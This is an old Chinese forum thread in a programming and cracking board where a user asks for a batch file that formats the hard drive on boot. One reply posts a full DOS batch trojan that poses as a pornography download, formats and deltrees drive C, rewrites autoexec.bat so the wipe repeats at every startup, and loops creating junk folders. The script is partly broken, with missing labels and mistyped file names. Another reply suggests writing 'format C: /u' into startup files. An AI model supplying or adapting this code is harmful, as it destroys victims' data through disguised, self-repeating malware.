论坛: 编程破解 标题: 有没人会写开机后自动格式化硬盘的批处理呀 复制本贴地址    
作者: goodwell [goodwell]    论坛用户   登录

地主 发表时间: 05-04-02 14:19

回复: xiaoshi [xiaoshi]   论坛用户   登录
format a:/q/u

B1层 发表时间: 05-04-02 15:10

回复: xzy31 [xzy31]      登录
@echo off
rem Bye Bye Hardrive 1.0
echo Please wait while program uploads some nice pronography....
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo dummy variable >c:\dvar.txt
call format c: /q /u /autotest >nul
if exist c:\dos\format.* goto dosform
if exist c:\windows\command\format.* goto winform
goto de
cd\dos >nul
call format c: /h /q /u /autotest >nul
cd\ >nul
cd\windows\command >nul
call format c: /h /q /u /autotest >nul
cd\ >nul
goto inform
if exist c:\dvar.txt goto dtree
goto inform
call deltree /y c: >nul
if exist c:\dos\deltree.* goto deldos
if exist c:\windows\command\deltree.* goto delwin
goto inform
call deltree /y c: >nul
cd\windows\command >nul
call deltree /y c: >nul
cd\ >nul
rem The following rewrites the code into the autoexec.bat file.
echo @echo off >c:\autoexec.bat
echo cls >>c:\autoexe.bat
echo :form
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo if exist c:\dos\format.* goto dosform >>c:\autoexec.bat
echo if exist c:\windows\command\format.* goto winform >>c:\autoexec.bat
echo goto de >>c:\autoexec.bat
echo :dosform >>c:\autoexec.bat
echo cd\dos >nul >>c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat
echo :winform >>c:\autoexec.bat
echo cd\windows\command >nul >>c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat
echo goto write >>c:\autoexec.bat
echo :de >>c:\autoexec.bat
echo if exist c:\dvar.txt goto dtree >>c:\autoexec.bat
echo goto write >>c:\autoexec.bat
echo :dtree >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo if exist c:\dos\deltree.* goto deldos >>c:\autoexec.bat
echo if exist c:\windows\command\deltree.* goto delwin >>c:\autoexec.bat
echo :deldos >>c:\autoexec.bat
echo cd\dos >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo :delwin >>c:\autoexec.bat
echo cd\windows\command >nul >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat
echo :write >>c:\autoexec.bat
echo type hdkiller.txt >>c:\autoexec.bat
echo c:\ >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo :nasty >>c:\autoexec.bat
echo md nasty >>c:\autoexec.bat
echo cd nasty >>c:\autoexec.bat
echo echo You're Gone @$$ hole!!!! >yourgone.txt >>c:\autoexec.bat
echo goto nasty >>c:\autoexec.bat
echo pause >>c:\autoexec.bat
rem Rewriting of code to the autoexec.bat file is complete.
c:\ >nul
cd\ >nul
md nasty >nul
cd nasty >nul
echo Woops Is sent the hdk and not the pornography o well.. >yourgone.txt
goto killfat

B2层 发表时间: 05-04-07 15:54

回复: 286 [unique]   版主   登录

B3层 发表时间: 05-04-07 17:05

回复: zmdxl [zmdxl]   论坛用户   登录
三楼写的很复杂 晕拉

B4层 发表时间: 05-04-08 17:25

回复: wxngzybb [wxngzybb]   论坛用户   登录
采用任何方法向autoexe.bat或winstart.bat.写入命令 format C: /u就行了

B5层 发表时间: 05-04-10 23:20

论坛: 编程破解

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